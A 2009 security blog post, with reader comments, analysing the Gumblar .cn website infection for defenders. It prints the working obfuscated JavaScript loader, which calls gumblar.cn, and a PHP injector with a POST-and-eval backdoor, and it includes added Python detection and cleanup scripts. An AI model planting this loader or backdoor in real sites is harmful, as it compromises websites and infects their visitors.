
Gumblar .cn Exploit – 12 Facts About This Injected Script

   07 May 09   Filed in Website exploits

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this:

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2 Every infected site has its own modification of the script. However, every modification has common parts and can be easily identified as the gumblar .cn script.

  1. The script starts with “(function(”
  2. The function has no name. It is anonymous and self-invoking.
  3. The script is obfuscated. That is, some characters are replaced with their numeric (hexadecimal) codes, and the “%” character is then replaced with some arbitrary character. Here are some sample excerpts of the obfuscated data: “…20a.3d.22Sc.72iptEngin.65…”, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…”, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…”
  4. Near the end of the script there is a “.replace(” call.
  5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /"/g or /~/g, etc. that restores the mangled “%” character.
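The five structural points above are enough to both recognise and reverse this obfuscation without knowing the domain in advance. The following is an added example written for this post, not the author's code or the malware itself: it runs on a constructed sample that uses `~` in place of `%` and decodes to a harmless `document.write()` pointing at the reserved name example.invalid, so no real loader is involved.

```python
import re
from urllib.parse import unquote

# Constructed sample (not the real Gumblar loader) in the shape the post describes:
# anonymous self-invoking function, unescape() of a string whose '%' was swapped
# for an arbitrary character ('~' here), a .replace() call near the end and a
# trailing /~/g regex. The payload decodes to a harmless document.write().
SAMPLE = (
    "(function(k){var p='%';eval(unescape(("
    "'d~6fcument~2ewrite(~22~3cscript src~3d~2f~2fexample~2einvalid~2f~3e~22)'"
    ").replace(k,p)))})(/~/g);"
)


def find_substitute_char(script):
    """Character standing in for '%', read from the trailing /X/g literal (or None)."""
    m = re.search(r"\}\)\(/(\\?.)/g\);?\s*$", script)
    return m.group(1).lstrip("\\") if m else None


def find_encoded_literal(script):
    """The string literal handed to unescape(), whichever quote style is used (or None)."""
    m = re.search(r"unescape\(\(?(['\"])(.*?)\1", script)
    return m.group(2) if m else None


def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX code units first, then %XX as Latin-1 bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def looks_like_gumblar(script):
    """Structural signature (items 1 to 5 above); no domain names involved,
    so it still matches when the substitute character changes per site."""
    s = script.strip()
    return (s.startswith("(function(")
            and "unescape(" in s
            and ".replace(" in s[-120:]
            and find_substitute_char(s) is not None)


def decode_gumblar_style(script):
    """Reverse the substitution and unescape; returns the decoded JS or None."""
    sub = find_substitute_char(script)
    enc = find_encoded_literal(script)
    if sub is None or enc is None:
        return None
    return js_unescape(enc.replace(sub, "%"))


def loader_hosts(decoded_js):
    """Hostnames the decoded stage would load from (//host/... or http(s)://host/...)."""
    return re.findall(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", decoded_js, re.I)


if __name__ == "__main__":
    if looks_like_gumblar(SAMPLE):
        decoded = decode_gumblar_style(SAMPLE)
        print("decoded:", decoded)
        print("loads from:", loader_hosts(decoded))
```

Decoding with Latin-1 rather than UTF-8 matters: JavaScript's `unescape()` turns each `%XX` into a single code unit, and the hostnames you want to blocklist or search your logs for come out of `loader_hosts()` only when the bytes are interpreted that way.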

3 When the script is executed (every time someone visits the infected web page), another script from “gumblar . cn/rss/” is silently loaded and executed.

4 This code is usually injected right before the <body> tag.  I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5 Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique, and the same clean-up steps can probably be applied.

6 Unlike the recent iframe exploits, where the malicious code was only injected into files with the most common filenames (e.g. index.html, index.php, etc.), this gumblar script is injected into every web page.

7 This script is also injected into .js (JavaScript) files, usually at the very bottom.

8 Maybe it’s just a coincidence, but about 95% of the infected sites used PHP. It is not possible to say for sure whether the remaining sites used PHP. Who knows.

9 This exploit doesn’t rely on any particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, and on proprietary PHP sites.

10 Some people reported that the following code is injected into PHP files:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64 _decode('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'));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

The base64-encoded part is this gumblar .cn script.

This PHP code, its structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected JavaScript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.
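Facts 4, 6, 7 and 10 together give a webmaster something concrete to look for: an obfuscated one-line script right before `<body>` in any page, the same script appended to `.js` files, and PHP files carrying the injector's identifiers or its error-handler/output-buffer hook. Below is an added triage scanner written for this post (not the author's tool and not Unmask Parasites); it builds a constructed fixture site in a temporary directory with harmless stand-ins for each of those cases and reports what it finds. The PHP fixture only reuses the kit's function names from fact 10; it contains no working backdoor.

```python
import os
import re
import tempfile

# Structural regex for the obfuscated loader: anonymous self-invoking function,
# unescape(), .replace() and a trailing /X/g regex, all on one line. Nothing
# site-specific, so per-site changes of the substitute character do not defeat it.
GUMBLAR_JS = re.compile(
    r"\(function\(\w*\)\{[^\n]*?unescape\([^\n]*?\.replace\([^\n]*?\}\)\(/\\?./g\);?"
)

# Triage hints for the PHP injector from fact 10. The second one also matches
# some legitimate frameworks, so treat it as a reason to inspect, not as proof.
PHP_MARKERS = [
    ("kit identifiers", lambda t: re.search(r"tmp_lkojfghx|TMP_XHGFJOKL", t) is not None),
    ("error-handler + ob_start hook", lambda t: "set_error_handler(" in t and "ob_start(" in t),
    ("POST-and-eval backdoor", lambda t: re.search(r"eval\(\s*\$_POST\[", t) is not None),
]

SCAN_EXTS = {".html", ".htm", ".php", ".js"}

# Constructed loader sample (decodes to "var x=1"), not the real script.
LOADER = "(function(k){var p='%';eval(unescape(('~76ar~20x~3d1').replace(k,p)))})(/~/g);"


def locate_js(text, match, ext):
    """Describe where an injected script sits (facts 4 and 7)."""
    tail = re.sub(r"^\s*</script>", "", text[match.end():], flags=re.I)
    if ext == ".js" and tail.strip() == "":
        return "appended at end of .js file"
    if tail.lstrip().lower().startswith("<body"):
        return "immediately before <body>"
    return "elsewhere in file"


def scan_text(path, text):
    """Findings for one file's content as a list of dicts."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    for m in GUMBLAR_JS.finditer(text):
        findings.append({"path": path, "kind": "obfuscated loader", "detail": locate_js(text, m, ext)})
    if ext == ".php":
        for label, hit in PHP_MARKERS:
            if hit(text):
                findings.append({"path": path, "kind": "php injector", "detail": label})
    return findings


def scan_tree(root):
    """Walk a web root (deterministic order) and scan every file with a relevant extension."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            if os.path.splitext(name)[1].lower() not in SCAN_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                findings.extend(scan_text(path, fh.read()))
    return findings


def finding_names(findings):
    """Sorted, de-duplicated base names of files with findings."""
    return sorted({os.path.basename(f["path"]) for f in findings})


def build_demo_site():
    """Write constructed fixture files (harmless stand-ins, not real infections)."""
    root = tempfile.mkdtemp(prefix="gumblar-demo-")
    os.makedirs(os.path.join(root, "images"))
    files = {
        "index.html": "<html><head><title>t</title></head>\n<script>" + LOADER + "</script>\n<body>hi</body></html>\n",
        "about.html": "<html><head></head><body>clean</body></html>\n",
        "main.js": "function greet(){return 'hi';}\n" + LOADER + "\n",
        "images/image.php": "<?php if(!function_exists('tmp_lkojfghx')){function tmp_lkojfghx($s){return $s;}\n"
                            "set_error_handler('tmp_lkojfghx2');ob_start('tmp_lkojfghx');} ?>\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    root = build_demo_site()  # replace with your real web root path
    for f in scan_tree(root):
        print(os.path.relpath(f["path"], root), "-", f["kind"], "-", f["detail"])
```

Run it against a copy of the site rather than the live tree, and remember what fact 2 says: the loader mutates per site, so a clean scan is evidence, not a guarantee, and restoring from a known-good backup remains the safer clean-up.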

11 This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12 Gumblar .cn domain is currently blacklisted by Google.

Removal

Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. That is, use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do this is to replace them with clean files from a backup.
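Because the injected script mutates per site, a signature-based clean-up can miss a variant; comparing the live tree against the backup does not. The following is an added example written for this post (not the author's procedure): it hashes both trees and lists what differs, using a constructed backup and "live" copy in a temporary directory. The real call would be `diff_against_backup("/path/to/live/site", "/path/to/clean/backup")` with your own paths.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map each file under root (path relative to root, POSIX separators) to its SHA-256."""
    digests = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root).replace(os.sep, "/")] = h.hexdigest()
    return digests


def diff_against_backup(live_root, backup_root):
    """Content comparison independent of any malware signature: 'modified' files
    get overwritten from the backup, 'added' files (an image.php that was never
    yours, for instance) get reviewed and deleted, 'missing' files get restored."""
    live, backup = hash_tree(live_root), hash_tree(backup_root)
    return {
        "modified": sorted(p for p in live if p in backup and live[p] != backup[p]),
        "added": sorted(p for p in live if p not in backup),
        "missing": sorted(p for p in backup if p not in live),
    }


def _write(path, content):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def build_demo_trees():
    """Constructed fixture (not a real site): a clean backup and a 'live' copy
    showing the kinds of change the post describes."""
    base = tempfile.mkdtemp(prefix="restore-demo-")
    backup, live = os.path.join(base, "backup"), os.path.join(base, "live")
    clean = {
        "index.html": "<html><body>home</body></html>\n",
        "about.html": "<html><body>about</body></html>\n",
        "contact.html": "<html><body>contact</body></html>\n",
        "js/main.js": "function greet(){return 'hi';}\n",
    }
    for rel, content in clean.items():
        _write(os.path.join(backup, rel), content)
    # Live copy: a script tag inserted before <body>, a line appended to the .js,
    # a dropped file under images/, contact.html gone, about.html untouched.
    _write(os.path.join(live, "index.html"),
           "<html><script>(function(){})();</script><body>home</body></html>\n")
    _write(os.path.join(live, "about.html"), clean["about.html"])
    _write(os.path.join(live, "js/main.js"), clean["js/main.js"] + "(function(){})();\n")
    _write(os.path.join(live, "images/image.php"),
           "<?php /* constructed placeholder standing in for a dropped file */ ?>\n")
    return live, backup


if __name__ == "__main__":
    live, backup = build_demo_trees()
    for kind, paths in diff_against_backup(live, backup).items():
        print(f"{kind}: {paths}")
```

Take the backup from before the first symptoms and check it with the same comparison against an older copy if you have one: a backup made after the FTP credentials were stolen may already contain the injected files.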

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…

Round Up of the Comments

The comments section of this blog post contains a lot of additional useful facts from webmasters of infected sites.  Be sure to read them.

Zork noticed that his site’s .htaccess file was modified.

Jason talks about what this exploit does from a visitor’s point of view. Of course, a visitor can be a webmaster of another site.

adel sarlak mentioned that this exploit also adds image.php files into image directories. It can also change directory permissions.

James also elaborates on the scripts in image.php and some other .php
files. He suggests a shell command to find infected files.

C Filorux shared information about a POST-and-eval backdoor script found on an infected site.

rad-one posted a PHP script that scans all files from your site looking for the exploit signatures.
It looks incomplete and you might need to finish it before using it.

More removal instructions from Neil Williams.

Great comment from web host LarryL, who deliberately infected a PC to find out how this virus works. With this information, he suggests a strategy for preventing re-infection.

Thanks for sharing this info. If anyone wants to publish an article about how they fought the infection or the impact of the infection, please contact me – I can publish it here as a guest post. I’m also looking for “hardening a website” tips and tricks.

P.S. I suggest that you use Unmask Parasites to check if your site is infected. It’s safe and fast.


Reader's Comments (194)

  1. |

    [...] Gumblar .cn Exploit – 12 Facts About This Injected Script You are only as secure as the passwords you use and the web server your Forum is on. If the server has been compromised/hacked, then there’s nothing vBulletin can do to prevent potential security violations. (Related thread on vBulletin.com) If you are not at ease with making the above mentioned changes, or fear that you’ll end up messing your vBulletin Forum; feel free to open a thread in our Forum Management section or simply add a comment here; asking for assistance. [...]

  2. |

    [...] This discussion on the web describes this situation; an excerpt follows: [...]

  3. |

    Hi, wouldn’t it work to write a PHP script that searches for that line of code and deletes it? That is, open the file, edit the line with the function and the one with the iframe, and close the file.

    Regards

  4. |

    Full virus removal (edit by Denis: in Arabic)
    http://www.alter-med.com/gum.htm

  5. |

    [...] finally managed to get rid of gumblar.cn infection and persuade google to list my site as clean again.  I am also planning to redesign this site a [...]

  6. |

    Our business is affected for more than one month now and tonight we have found your web site. We will try all you teach us.

    But we have found this Trojan put its “feet” in the restore application of Windows. (Sorry for my poor English.) It is this function that lets you go back in the past to restore your computer.

    We have found the restore is corrupted.

    We have also deleted all our FTP softwares, dreamweaver too.

    But Registry Mechanic always shows us CuteFTP is not “complete” and asks us for permission to repair it. We always click “no”. But we have uninstalled this software and manually destroyed all resident files. So we think this Trojan put something in the registry too.

    We have erased all history because web sites are saved on the hard disk in that history. Now we don’t let web sites be kept on the hard drive when we close the computer.

    Hoping this info will help everybody too.

  7. |

    My sites are suffering from Gumblar virus too.

    If the hackers have our FTP login/password information, why don’t they do more damage to the sites? Not that I want them to, but I just don’t understand the logic once they hack into WordPress or other open-source scripts.

    About 20-25%+++ of sites are running some sort of Opensource scripts.

    • |

      Hackers are not interested in damaging legitimate web sites. They just use them to effectively distribute malware, which is a multi-million dollar business.

      You might want to read this article: The economics of Botnets

  8. |

    [...] the little blackhat with the Gumblar and the KoobFace Yeah buddy, they’re his own bots That little blackhat got his own jet [...]

  9. |

    I marked one more thing.

    All the malicious files uploaded to my site were in directories where the permission was 777.
    None of the other directories had any malicious file!

    That means their target is directories with 777 permission.

    But I don’t know how they could upload the files without FTP access?

    Or if they had FTP access, then why was it uploaded where the directory permission was 777?

    • |

      That must be coincidence. Gumblar injects scripts into any files regardless of permissions.

      Anyway, I haven’t heard of new Gumblar attacks for more than 3 months now.

  10. |

    [...] … </SCRIPT> with the malicious code from all your .htm, .php, .asp, etc. files. Here are instructions on how to identify it specifically (in English), although any webmaster with [...]

  11. |

    A variant of Gumblar is activated again.
    Two of our domains have just been infected:
    Included in the body section of all .htm is:

    Also a image.php file is included in our image library.
    js-files have been altered

  12. |

    This is what I hate about the internet, when someone is wreaking such havoc with so many people and there is a clear path to the source which is obvious to everyone surely somebody can take action and shutdown this gumblar.cn site and track the owners down, where are the authorities? why is this site and domain still active and why are the owners still able to operate. it’s plain crazy many, if authorities won’t act then why isn’t somebody putting a hit or jihad out on them!!

    • |

      I agree completely, this is terrorism and it affects so many people both personal and business sites not to mention visitors of those infected sites. It must be costing webmasters hundreds of thousands if not millions of dollars and hours so yeah I think the originators do need to be tracked down and caught. I would chip in some money to see them hunted like the dogs they are!!

  13. |

    [...] information can be found here: Gumblar.cn Exploit, 12 facts about this injected script A few more facts about the gumblar attack from sophoslab and scansafe Martuz.cn is a new [...]

  14. |

    Our site was infected 14 days ago. So we cleaned the server, installed everything new with all security updates, newest PHP and SQL version, even new Joomla!.
    Now, our webserver has been infected the second time… There are a lot of tutorials on how to disinfect the webserver (or just clean up by deleting everything), but what about the computer? How can we clean possibly infected computers too? We use a SonicW… firewall with content filter, and TrendM… antivirus with antispy – both don’t find the virus on the PC. Even a special anti-malware software will detect Gumblar. so.. how to protect and how to clean?

  15. |

    As an FYI, a friend’s sites got hit with this with continuous re-infections. I wrote a Windows service that monitored his server and while not stopping the infection it does immediately fix the infections. I have a few more days of testing but will post it at

    http://reddwarfdogs.com/websitehack/ around oct 27th..

  16. |

    Make sure to check the folders “error_docs” and “httpsdocs” on your webserver!!!

    The malicious code can also be found in these locations – therefore the infection will not be cured if you just upload a clean backup version of your website from a clean system unless you sanitize those locations too.

  18. |

    [...] The virus that owned the old site (along with every other index.* on my webspace) was a variant of the Gumblar.cn virus http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  19. |

    I have several sites; you rightly point to the password security. I have like this ……

    inserted before <body tag in all my html pages. I replace them with clean files from my hard disk; but next day the files are again corrupt with new <script with a new url

  21. |

    If you know the date of the infection, you can easily check all files that were edited on that day.

    BTW, I noticed it replaced a file called home.inc, so it probably also targets all files containing “home” in the name, in addition to “index”, “default”, etc. and ALL .js files.

  22. |

    [...] its name is Gumblar. You can find further information about Gumblar on Unmask Parasites Blog, Wikipedia, or ISS.net. I got alot of useful information. However, I might be infected by its [...]

  23. |

    [...] malware researchers reported widespread compromises pointing to the domains gumblar.cn and martuz.cn, both of which made it on [...]

  24. |

    [...] with viruses like Gumblar stealing FTP passwords and farming them out to hackers so they can upload malicious code into user files. What you end up with is a flood of complaints from users about errors on their [...]

  25. |

    Hi i have made this script to remove all scripts on server using PERL. See the script @ Remove Gumblar Virus

    • |

      Hi,

      1. The linked article is not about Gumblar. It describes a different infection (this one)

      2. Use the script at your own risk. The scripts used by this infection mutate every day and that removal script may not detect the new modifications (at best) or may even corrupt your data (in the worst case).

      3. You don’t need any removal scripts at all if you have a clean backup. Just remove everything and then restore the site from that backup.

  26. |

    [...] details For more details about Gumblar, see this Wikipedia article or this Unmask Parasites article. For a technical summary of Gumblar, there’s a nice article on iss.net about it. [...]

  27. |

    Hey, hopefully someone can make use of this 

    If you are having issues running virus scanners whilst your computer is turned on, try to start into ‘Safe Mode’.

    If you’re using a version of Windows, you’ll be able to do this. (Windows XP, Windows Vista & Windows 7)

    Safe Mode:
    Turn computer off
    Turn computer on whilst tapping F8. When prompted select ‘safe mode with networking’
    When prompted, click Yes & start into Windows as normal.

  28. |

    Just to add some info.

    Our clients’ sites got injected, more than 200 sites; we have recovered all the sites, and it seems to only have affected the index files, or at least the files that have common names.

    We are still checking the wp sites but these seem more affected.

    Still haven’t found the computer that originated the FTP “hole”, as many of the sites are not on more recent FTP software. But lesson learned: don’t store passwords in the software.